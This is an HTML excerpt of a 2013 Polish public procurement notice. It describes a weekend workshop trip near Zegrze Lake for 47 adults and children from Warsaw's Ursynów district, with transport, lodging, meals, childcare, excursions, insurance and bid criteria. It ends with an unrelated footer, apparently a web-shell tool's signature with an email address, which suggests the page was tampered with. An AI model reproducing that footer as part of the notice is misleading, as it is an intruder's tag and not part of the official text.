<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część II. Wyjazdowy warsztat motywacyjno-integracyjny - 10 godzin lekcyjnych. 
- Warsztat wyjazdowy odbędzie się w weekend, w terminie 13.04-14.04.2013 r., 
w okolicach Jeziora Zegrzyńskiego: Białobrzegi/Jachranka/Zegrze. 
- Przewidywana liczba osób: 47 osób, w tym: 28 osób dorosłych (w tym 2 pracowników Ośrodka Pomocy Społecznej Dzielnicy Ursynów) i 19 dzieci (w tym 3 dzieci w wieku od 3 do 4 lat oraz 16 dzieci w wieku od 5 do 16 lat). 
- Wykonawca zapewni:
a) transport uczestników projektu (osoby dorosłe i dzieci oraz 2 pracowników Ośrodka), autokarem  o podwyższonym standardzie (toaleta, klimatyzacja/ogrzewania, regulowane oparcia foteli),  z Warszawy terenu dzielnicy Ursynów do miejsca realizacji usługi i z powrotem oraz pomiędzy miejscami zwiedzania;
b) nocleg i wyżywienie dla całej grupy. Zamawiający wymaga aby zakwaterowanie wszystkich uczestników miało miejsce w jednym budynku. Miejscem zakwaterowania ma być ośrodek, pensjonat itp., w którym zostanie zagwarantowany nocleg i wyżywienie dla całej grupy. Ośrodek powinien być dostosowany do pobytu dzieci - ogrodzony teren i plac zabaw przy ośrodku. Na terenie ośrodka powinna znajdować się sala szkoleniowa wyposażona w niezbędny sprzęt, w szczególności: flip-chart wraz z pisakami, ekran, rzutnik oraz sala do prowadzenia zajęć z dziećmi; 
c) wyżywienie dla całej grupy podczas pobytu w miejscu realizacji usługi: 13.04.2013 r.- obiad oraz kolacja, 14.04.2013 r. -śniadanie i obiad oraz poczęstunek pierwszego i drugiego dnia podczas warsztatów dla uczestników (kawa, herbata, soki, woda, owoce oraz ciastka) i dla dzieci; 
d) opiekę dla dzieci uczestników warsztatów podczas trwania zajęć wraz 
z materiałami edukacyjnymi (np.: kredki, zabawki, książki itp.); 
e) wycieczkę do Serocka (pierwszego dnia) - zwiedzanie Kościoła Zwiastowania NMP, spacer po Rynku i spacer nad Narwią, 
f) wycieczkę do Pułtuska (drugiego dnia) - zwiedzanie Bazyliki katedralnej NMP, Domu Polonii, Muzeum Regionalnego,
g) przewodnika i bilety wstępu do miejsc zwiedzania,  
h) ubezpieczanie 47 uczestników wyjazdu od NNW 
- Wykonawca pokrywa koszty związane z transportem, noclegiem i wyżywieniem trenerów i obsługi wyjazdu. 
- Koszt usługi będzie uzależniony od rzeczywistej liczby osób, które wezmą udział 
w wyjeździe. 
- Na 7 dni przed wyjazdem Zamawiający przekaże ostateczną liczbę uczestników.
Szczegółowy opis przedmiotu zamówienia określony został w załączniku Nr 1 
do SIWZ. 
W związku z niemożnością dokładnego określenia wielkości zamówienia, Zamawiający zastrzega sobie prawo zmniejszenia maksymalnie o 20 % liczby osób (dotyczy części II przedmiotu zamówienia) oraz liczby godzin usług (dotyczy części I przedmiotu zamówienia) podanych w ust 3. Ewentualne zmniejszenie wielkości zamówienia nie będzie skutkowało odpowiedzialnością Zamawiającego. 
Wartość przedmiotu zamówienia w odniesieniu do części I będzie iloczynem podanej przez Wykonawcę ceny 1 godziny usługi brutto i przewidywanej (w okresie trwania umowy) liczby godzin usług, natomiast wartość zrealizowanego zamówienia będzie wynikała z iloczynu 1 godz. usługi i faktycznej liczby wypracowanych godzin usług. 
Wartość przedmiotu zamówienia w odniesieniu do części II będzie iloczynem podanej przez Wykonawcę ceny za 1 osobę brutto i przewidywanej (w okresie trwania umowy) liczby osób uczestniczących w wyjeździe, natomiast wartość zrealizowanego zamówienia będzie wynikała z iloczynu 1 wartości przypadającej na 1 osobę i faktycznej liczby osób uczestniczących w wyjeździe. 
Uzupełnieniem opisu przedmiotu zamówienia są warunki zawarte we wzorze umowy stanowiącym Załącznik nr 8a i 8b do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0, 55.10.00.00-1, 55.27.00.00-3, 60.17.20.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 13.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. doświadczenie zawodowe osób wykonujących przedmiot zamówienia jako trener warsztatów aktywizacyjnych - 20</li>
<li>3. doświadczenie zawodowe osób wykonujących przedmiot zamówienia w pracy z osobami zagrożonymi lub wykluczonymi społecznie - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com